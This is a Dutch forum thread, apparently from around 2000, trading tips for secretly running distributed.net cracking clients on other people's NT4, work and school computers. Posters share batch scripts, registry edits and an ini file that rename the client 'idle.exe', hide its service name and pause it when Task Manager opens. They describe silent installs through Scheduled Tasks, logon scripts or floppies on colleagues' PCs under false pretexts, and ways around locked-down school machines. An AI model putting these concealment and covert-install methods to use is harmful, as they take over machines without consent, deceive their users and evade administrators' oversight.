Toon posts:

Tips voor geheime koeien?

Pagina: 1
Acties:
  • 185 views sinds 30-01-2008
  • Reageer

Verwijderd

Topicstarter
Aangezien ik hier veel vraag zie naar geheime koeie, open ik dit onderwerp.

Wie heeft er nog meer tips voor geheime koeien op NT4


Dit zijn die van mij:

Op NT4 zijn voor een goed werkende koe 3 bestandjes nodig tw dnetc.exe, dnetc.com, dnetc.ini.

Deze bestanden heb ik gerenamed (ini bestand moet dezelfde naam hebben als exe). Ik heb hier alles "idle.*" genoemd. De bestanden moeten bij elkaar in dezelfde dir staan. Kan dus gewoon je windir gebruiken.

Het proces in de taskmgr heet nu idle.exe: Valt in ieder geval weer wat minder op voor de meeste leken en ze zullen niet gaan zoeken op internet op "dnetc"

In de regitry wijzig ik de diplay naam van de service van "Ditributed.net Client" naar "Idle": om dezelfde reden als hierboven

[HLM\SYSTEM\CurrentControlSet\Services\dnetc]
"DisplayName"="Idle"


Dan ziet mijn idle.ini (dnetc.ini) er als volgt uit:

--------------------------------
[parameters]
id=vwa@worldonline.nl

[misc]
project-priority=RC5,DES=0,CSC=0,OGR=0

[rc5]
fetch-workunit-threshold=125
flush-workunit-threshold=50
randomprefix=162

[networking]
dialup-watcher=disabled
keyserver="netbiosnaam van je pers. proxy"

[buffers]
frequent-threshold-checks=yes

[triggers]
pause-watch-plist=taskmgr.exe
--------------------------------


Je ziet dat ik een persoonlijk proxy gebruik. Dit is om alle clients goed in de gaten te kunnen houden en er zeker van te zijn dat er geflusched wordt.

"pause-watch-plist=taskmgr.exe" is er voor om er voor te zorgen dat de CPU usage niet op 100% staat als de taskmgr is geopened. Zodra de taskmgr is afgesloten gaat hij weer
volop de idle time op grazen.


Ik gebruik dit install scriptje

---------------------------------
@Echo off
if exist %windir%\idle.exe %windir%\idle.exe -shutdown

if exist %windir%\idle.exe %windir%\idle.exe -uninstall

xcopy %0\..\idle %windir% /e /i /r /q /k >nul

%windir%\idle.exe -install

net start "dnetc" >nul
------------------------------------

Heb je nog goede tips dan zien we die graag verschijnen!!

  • Eddict
  • Registratie: Februari 2000
  • Laatst online: 04-12-2025

Eddict

has Anterograde amnesia

BeeSmart, tip: dnetc.com heb je helemaal niet nodig...

Verwijderd

Topicstarter
Eddict,

Weet jij waar is dnetc.com voor nodig is

Verwijderd

vertel vertel :)

  • Chakotay
  • Registratie: Oktober 1999
  • Laatst online: 22-05 23:35

Chakotay

Lick here to continue

Live for today, screw yesterday, hope for tomorrow...
Stichting eth0


  • [eNeRGy]
  • Registratie: November 1999
  • Laatst online: 24-04-2025
dnetc.com is voor cmd. mode (denk ik)

Greetinx [eNeRGy]

  • Digistorm
  • Registratie: Januari 2000
  • Laatst online: 06-05 09:59

Digistorm

ex-demo scener

EHm, jongens... die dnetc.com is de DOS versie! :o
Das leuk voor je 386, maar verder nergens voor nodig :)
Mijn "installkit" bestaat uit een ini, een exe, een reg file en een bat file...
die reg file bevat de registry zooi om hem goed hidden te kunnen draaien...

Hier stond achterhaalde informatie…


  • Kookie
  • Registratie: Maart 2000
  • Niet online
Kunnnen we misschien een kijkje krijgen in jou reg file?

Ben benieuwd wat je erin hebt staan.

  • StarLite
  • Registratie: Januari 2000
  • Laatst online: 01-12-2025

StarLite

'ON ERROR RESUME NEXT

leuk maar ik kan daar helaas NIKS mee aangezien we hier opschol echt HELEMAAL NIKS kunnen op WINNT :( .

Ik kan dus niks openen door er op de dubbelklikken. Zelf geen *.txt file.
Alleen *.doc *.xls en powerpoint bestanden.
heel misschien ook *.html mar dat weet ik niet zeker.

Hoe kan ik TOCH! dnetC installenĀæ

tyrips, tywreps, tiewreps, tiereps, tie raps, ripties, taiwraps, kabelbindbandjes Ā» Tie Wraps
\o/


Verwijderd

Dit kan er in je regfile staan:


REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Distributed.net"="c:\\Program Files\\Distributed.net\\dnetc.exe -hide"


of:

REGEDIT4

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Distributed.net"="c:\\Program Files\\Distributed.net\\dnetc.exe -hide"

  • Tuinhark
  • Registratie: April 2000
  • Laatst online: 26-05 20:37

Tuinhark

Retro

Zoals ME al zei....

Bij mij op school is de boel ook goed gelocked. :(

Gelukkig heb je nog een TMP dir en een startup groep in WINNT. Da's iets.....

  • Kookie
  • Registratie: Maart 2000
  • Niet online
Die ene reg setting is hetzelfde als dnetc -install.

Kun je trouwens beter gebruiken dan run.

  • dyna18
  • Registratie: Januari 2000
  • Laatst online: 13-03 14:38
BeeSmart> Hoe kun je dat install scriptje uitvoeren?

  • hessel|IA
  • Registratie: Januari 2000
  • Laatst online: 05-11-2024
Noem client en ini file naar een programa dat mag worden gestart b.v. verkenner.exe notepad.exe nu heb je kans dat het gewoon op start

Grutte Pier fansels


  • Eddict
  • Registratie: Februari 2000
  • Laatst online: 04-12-2025

Eddict

has Anterograde amnesia

DiGiSTORM_,

DNETC.COM is NIET voor DOS of i386 maar is een NT console programma !

Verwijderd

Is er een andere manier dan een herstart om de DisplayName daadwerkelijk "Idle" te laten heten? :(

En is er een manier om al je koeien in de gaten te houden middels een log script?

  • Eddict
  • Registratie: Februari 2000
  • Laatst online: 04-12-2025

Eddict

has Anterograde amnesia

De koe kan zelf loggen of als je een PerProxy draait kun je die log laten analyseren (tig progjes voor...)

  • Flagg
  • Registratie: Oktober 1999
  • Niet online

Flagg

It's a shite state of affairs

Geheime koeien???

Zijn dat een soort 007 koeien met een licence to graze??

Duister.

F.

Irish diplomacy is telling a man he can go to hell in such a way he actually looks forward to it.


Verwijderd

Tip om in een batch file een registrie entry te maken!!!
Je maakt dus een Reg filetje
en in het bat filetje zet je

regedit -s regfile.reg

Nu vraagt ie niet eens meer om bevestiging of je het ook echt wilt.

Ik hoop dat jullie er wat aan hebben.

Verwijderd

De boel gelocked op school ? Wat is het probleem ? Je zit toch op school om te leren ? Niet ?

Everything is hackable ! (zeker voor een goed doel) NT is geen uitzondering.

Zet je problemen in een topic en we lossen het gewoon samen op.

  • Digistorm
  • Registratie: Januari 2000
  • Laatst online: 06-05 09:59

Digistorm

ex-demo scener

Eddict>
Oja? Hmm que?? Ik kan me herinneren dat ik vroeger de .com in een MS-DOS sessie draaide (echte msdos dus) maar, dat hebben ze dus veranderd??
Of zijn er soms 2 .com bestanden???
Nougoed, ik ga me maar alvast :o :)

Hier stond achterhaalde informatie…


Verwijderd

als de hele zooi is dichtgetimmerd...

zijn ze nogal een sa de scheduler vergeten...

dus a:\soon.exe c:\winnt\dnetc -hide

soon.exe staat in de reskit......

istwah ?

meuh

Verwijderd

Topicstarter
Kookie: ik wijzig alleen maar de service display name met mijn reg file-tje er staat verder niets in. Je kan een tooltje zoals instsrv.exe van de reskit (zijn nog veel meer en betere van) gebruiken om de service
onder een andere naam en volkomen silent te installeren

Dyna18: Hier een paar methode om de koe te installeren:

1) Ik kan het hier vrij eenvoudig houden, iedereen is hier namelijk lokaal administrator en we hebben maar ongeveer 150 clients in het netwerk. De installatie staat op onze voor iedereen gemapte software installatie drive. Dus als ik in de buurt van een paar PC's ben zeg ik gewoon dat ik even iets moet installeren. Hoef dus niet in en uit te loggen. Klik daarna ff de reg file aan zodat de volgende dag als de PC is uit geweest de Service DisplayName is gewijzigd. Ik doe dit niet bij mensen die denken verstand te hebben van Windows (Je kent ze wel).

2) Ik heb ook een remote installatie die ik op afstand bij iemand kan uit voeren. Die gene hoeft geen admin te zijn om de service te kunnen installeren. Hiervoor gebruik ik "Scheduled task" (vanaf sp4). Sleep gewoon de batch file in de Scheduled task van een client, je kan hierin een account naam opgeven en je kunt de job direct starten. Je moet wel ff je batch file aanpassen zodat de service met een andere tool wordt geinstalleerd zodat deze niet blijft hangen op afwachting van een Enter, de gebruiker ziet er namelijk niets van.
Zoals ik al zei in de reskit is een prompt tooltje instsrv.exe. Ik gebruik zelf een ander tooltje dat ik van BHS heb gedownload.


3) Als je het echt als een Die-Hard met veel risico wil doen (wel direct een hoop koeien) kan je optie 2 in het logon script zetten. Ik hou het liever iets subtieler en wat meer onder controlle

Als je nog vragen hebt hoor ik dat wel, ben hier echt in thuis, deployen van software,.... SMS, WinInstalll, KiXtart You name it. Misschien kan ik je /or everyone helpen.

Het wordt tijd dat ik eens wat vbs gaat leren voor de WSH, we blijven lekker bezig toch!!!

  • dyna18
  • Registratie: Januari 2000
  • Laatst online: 13-03 14:38
Kun je nog wat meer over dat scriptje vertellen? Ik zie hier de inhoud, maar hoe werkt het, hoe voer je het uit?

Ik ben gewoon gebruiker op een zwaar beveiligd netwerk, waar bijna niets mogelijk is. Alleen programmatjes die geen reg. instellingen nodig hebben kunnen gebruikt worden.

Om de boel dus automatisch te laten opstarten, moet er dus een proggie in de client zijn userdir staan, plus een link in de startup folder.

Ik heb een scriptje nodig dat ff heel snel, in 1 keer dit installeerd. Handig als mensen ff weggaan om te lunchen ofzo.

  • Eddict
  • Registratie: Februari 2000
  • Laatst online: 04-12-2025

Eddict

has Anterograde amnesia

DiGiSTORM_,

.COM bestanden kunnen zowel 16-bit zijn (DOS) als 32-bit (NT console).
De DOS versie zal wel dezelfde naam hebben, maar dat wil niet zeggen dat het hetzelfde bestand is of dat je 'm op beide platformen kan draaien...

Verwijderd

Topicstarter
Nieuw script voor op NT, volkomen onzichtbaar.

Installatie zonder derde partij tooltje.

Vanuit logonscript voor gebruikers met admin rechten of met Scheduled Task voor gebruikers zonder admin rechten:

--------------------------------
@Echo off

if exist %windir%\idle.exe goto end
net use s: \\server\idle >nul
xcopy s:\windir %windir% /e /i /r /q /k >nul
%windir%\idle.exe -hide -install
net start "dnetc" >nul
regedit /s s:\idle.reg
net use s: /d >nul
:end
--------------------------------


Vanaf Flop:

--------------------------------
@Echo off

if exist %windir%\idle.exe goto end
xcopy a:\windir %windir% /e /i /r /q /k >nul
%windir%\idle.exe -hide -install
net start "dnetc" >nul
regedit /s a:\idle.reg

:end
--------------------------------

  • Eddict
  • Registratie: Februari 2000
  • Laatst online: 04-12-2025

Eddict

has Anterograde amnesia

BeeSmart,

net start "dnetc" >nul

zou je nog kunnen vervangen door

%windir%\idle.exe -svcstart

(voor de netheid ;))

Verwijderd

kan dit ook voor win95/98 gebruikt worden?

Of moet je dan ƩƩn en ander aanpassen in het script/bat/reg.

USRF_Herman.

Verwijderd

Topicstarter
Moet er wel het 1 en ander aangepast worden, ik heb ff geen, ik kijk wel of ik hiet binnen kort iets over kan posten.

Wel belangrijk; er zijn erg veel 9x clients

Verwijderd

Juist daarom........

Calcium koeien voor de 9x clients :)
Pagina: 1